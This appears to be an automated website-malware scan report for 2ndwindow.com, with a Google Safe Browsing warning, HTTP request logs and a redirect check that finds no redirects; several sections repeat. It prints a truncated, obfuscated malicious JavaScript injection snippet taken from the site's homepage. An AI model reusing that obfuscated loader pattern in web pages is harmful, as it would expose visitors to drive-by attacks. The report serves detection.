Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=2ndwindow.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://2ndwindow.com/ | 200 OK Content-Length: 3095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var g=new Date();var c="";var j='s>e>t@Axt>t+r$i>b@u@t>e$'.replace(/[\$\+@x\>]/g, '');var r='sfrfcm'.replace(/[mf9gG]/g, '');var p='cBrve5a*tBevE2lveBmve*nBtB'.replace(/[B\*v25]/g, '');var z=document;var y='d*eUf,ebr,'.replace(/[,bu\*U]/g, '');var w=new Date();var pw='awp>pweZnZd>CZhZi>l*d|'.replace(/[\|w\*\>Z]/g, '');var l_;if(l_!='yp' && l_!='_y'){l_=''};var v='ocngl+ocagd0'.replace(/[0\+c@g]/g, '');var k='bfo@d@yk'.replace(/[kvfR@]/g, '');var tf=new Strin Antivirus reports:
| ||
http://2ndwindow.com/test404page.js | 404 Not Found Content-Length: 103 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 2ndwindow.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Sep 2014 19:35:28 GMT
Accept-Ranges: bytes
ETag: "f699a48458f2cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 3095
Content-Type: text/html
Last-Modified: Mon, 14 Jan 2013 13:10:26 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...3095 bytes of data.
GET / HTTP/1.1
Host: 2ndwindow.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Sep 2014 19:35:28 GMT
Accept-Ranges: bytes
ETag: "f699a48458f2cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 3095
Content-Type: text/html
Last-Modified: Mon, 14 Jan 2013 13:10:26 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...3095 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 2ndwindow.com
Referer: http://www.google.com/search?q=2ndwindow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 2ndwindow.com
Referer: http://www.google.com/search?q=2ndwindow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.